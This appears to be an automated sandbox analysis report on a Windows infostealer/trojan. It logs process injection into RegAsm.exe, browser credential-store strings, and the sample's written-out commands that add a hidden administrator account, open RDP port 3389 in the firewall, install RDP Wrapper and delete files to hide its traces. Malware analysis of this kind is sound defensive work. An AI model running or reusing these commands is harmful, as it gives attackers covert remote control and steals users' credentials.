Source: 66f5de72d9ebd_rdp[1].exe.6.dr, UkRQSW5zdGFsbGVyQUFB.cs	Base64 encoded string: 'Rm4MG6rd1SN7Wo9CLx5vPeaVwDC2pcgwGCnVCzwmFmZmhwbmfiEWuK8DPjVl7ZpCziLS4+w5F1rWwxW5IjCcNw==', 'Rm4MG6rd1SN7Wo9CLx5vPeaVwDC2pcgwGCnVCzwmFmZmhwbmfiEWuK8DPjVl7ZpCziLS4+w5F1rWwxW5IjCcNw==', 'XohKHRUP1q1zoi1cdFzmb+hRBrfJyjigj0IG17FL08xCHjZIOqV1TYciZPU9zM9I9LjqmdLTRjMJ3OFW3e6AgQ8EyJ8xLS7gB1qXVddjvvE3+ZyaEyZJyOhL+IVKwejhsbpKHLn+/aM='
Source: CFHIIEHJKK.exe.6.dr, UHJvZ3JhbUFB.cs	Base64 encoded string: 'LROw/ocyJreQVkBTZvl7OBssok9gw2ju6Qfe7b+JT01lW9MUPsj68DhkAI4ibyqjKCtcLKeJNYA='
Source: CFHIIEHJKK.exe.6.dr, QXNzZW1ibHlMb2FkZXJB.cs	Base64 encoded string: 'YWrJ2+g0t2313nx3LyyJJhh5Cws2Jt788zD4XGLCyNPviMBR5z8ILg=='
Source: CFHIIEHJKK.exe.6.dr, UkRQSW5zdGFsbGVyQUFB.cs	Base64 encoded string: 'Rm4MG6rd1SN7Wo9CLx5vPeaVwDC2pcgwGCnVCzwmFmZmhwbmfiEWuK8DPjVl7ZpCziLS4+w5F1rWwxW5IjCcNw==', 'Rm4MG6rd1SN7Wo9CLx5vPeaVwDC2pcgwGCnVCzwmFmZmhwbmfiEWuK8DPjVl7ZpCziLS4+w5F1rWwxW5IjCcNw==', 'XohKHRUP1q1zoi1cdFzmb+hRBrfJyjigj0IG17FL08xCHjZIOqV1TYciZPU9zM9I9LjqmdLTRjMJ3OFW3e6AgQ8EyJ8xLS7gB1qXVddjvvE3+ZyaEyZJyOhL+IVKwejhsbpKHLn+/aM='

Source: classification engine

Classification label: mal100.spre.troj.spyw.evad.winEXE@65/45@16/14

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 6_2_6CA20300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

6_2_6CA20300

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 6_2_004114A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

6_2_004114A5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 6_2_00411807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,

6_2_00411807

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

File created: C:\Program Files\RDP Wrapper

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7016:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4296:120:WilError_03
Source: C:\ProgramData\CFHIIEHJKK.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:516:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3540:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4236:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6072:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4332:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6312:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2352:120:WilError_03

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user~1\AppData\Local\Temp\delays.tmp

Jump to behavior

Source: Yara match	File source: 30.2.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.0.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001E.00000002.2111451674.0000000000401000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.2065902266.0000000000401000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, type: DROPPED

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: file.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegAsm.exe, 00000006.00000002.2104122176.0000000032660000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.6.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: RegAsm.exe, 00000006.00000002.2077361190.00000000202C8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2111425893.000000003E534000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000006.00000002.2070721006.000000001A35C000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.6.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: RegAsm.exe, 00000006.00000002.2104122176.0000000032660000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.6.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: RegAsm.exe, 00000006.00000002.2077361190.00000000202C8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2111425893.000000003E534000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000006.00000002.2070721006.000000001A35C000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.6.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: RegAsm.exe, 00000006.00000002.2077361190.00000000202C8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2111425893.000000003E534000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000006.00000002.2070721006.000000001A35C000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.6.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: RegAsm.exe, 00000006.00000002.2077361190.00000000202C8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2111425893.000000003E534000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000006.00000002.2070721006.000000001A35C000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.6.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: RegAsm.exe, 00000006.00000002.2104122176.0000000032660000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.6.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: RegAsm.exe, 00000006.00000002.2077361190.00000000202C8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2070721006.000000001A35C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: RegAsm.exe, 00000006.00000002.2104122176.0000000032660000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.6.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: RegAsm.exe, 00000006.00000002.2104122176.0000000032660000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.6.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: RegAsm.exe, 00000006.00000002.2104122176.0000000032660000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.6.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: RegAsm.exe, 00000006.00000002.2077361190.00000000202C8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2070721006.000000001A35C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: RegAsm.exe, 00000006.00000002.2104122176.0000000032660000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.6.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: RegAsm.exe, RegAsm.exe, 00000006.00000002.2077361190.00000000202C8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2111425893.000000003E534000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000006.00000002.2070721006.000000001A35C000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.6.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000006.00000002.2077361190.00000000202C8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2111425893.000000003E534000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000006.00000002.2070721006.000000001A35C000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.6.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: RegAsm.exe, 00000006.00000002.2104122176.0000000032660000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.6.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: RegAsm.exe, 00000006.00000002.2077361190.00000000202C8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2070721006.000000001A35C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: RegAsm.exe, 00000013.00000002.2456368486.0000000001498000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.000000000149B000.00000004.00000020.00020000.00000000.sdmp, KKFHJD.19.dr, HJJKFB.6.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: RegAsm.exe, 00000006.00000002.2077361190.00000000202C8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2070721006.000000001A35C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: RegAsm.exe, 00000006.00000002.2104122176.0000000032660000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.6.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: RegAsm.exe, 00000006.00000002.2077361190.00000000202C8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2070721006.000000001A35C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: RegAsm.exe, 00000006.00000002.2104122176.0000000032660000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.6.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

ReversingLabs: Detection: 44%

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\GIEHJDHCBA.exe "C:\ProgramData\GIEHJDHCBA.exe"
Source: C:\ProgramData\GIEHJDHCBA.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\GIEHJDHCBA.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\GIEHJDHCBA.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\GIEHJDHCBA.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\BKKFCFBKFC.exe "C:\ProgramData\BKKFCFBKFC.exe"
Source: C:\ProgramData\BKKFCFBKFC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\BKKFCFBKFC.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\CFHIIEHJKK.exe "C:\ProgramData\CFHIIEHJKK.exe"
Source: C:\ProgramData\CFHIIEHJKK.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net user
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\CGHDAKKJJJKJ" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\ProgramData\CFHIIEHJKK.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
Source: C:\ProgramData\CFHIIEHJKK.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user RDPUser_0d457744 eU6fmVsXHNUV /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net user RDPUser_0d457744 eU6fmVsXHNUV /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user RDPUser_0d457744 eU6fmVsXHNUV /add
Source: C:\ProgramData\CFHIIEHJKK.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net localgroup
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup
Source: C:\ProgramData\CFHIIEHJKK.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
Source: C:\ProgramData\CFHIIEHJKK.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net localgroup "Administrators" RDPUser_0d457744 /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_0d457744 /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Administrators" RDPUser_0d457744 /add
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\GIEHJDHCBA.exe "C:\ProgramData\GIEHJDHCBA.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\BKKFCFBKFC.exe "C:\ProgramData\BKKFCFBKFC.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\CFHIIEHJKK.exe "C:\ProgramData\CFHIIEHJKK.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\CGHDAKKJJJKJ" & exit	Jump to behavior
Source: C:\ProgramData\GIEHJDHCBA.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\GIEHJDHCBA.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\GIEHJDHCBA.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\BKKFCFBKFC.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\CFHIIEHJKK.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user
Source: C:\ProgramData\CFHIIEHJKK.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net user
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net user RDPUser_0d457744 eU6fmVsXHNUV /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user RDPUser_0d457744 eU6fmVsXHNUV /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_0d457744 /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Administrators" RDPUser_0d457744 /add

Source: C:\Users\user\Desktop\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
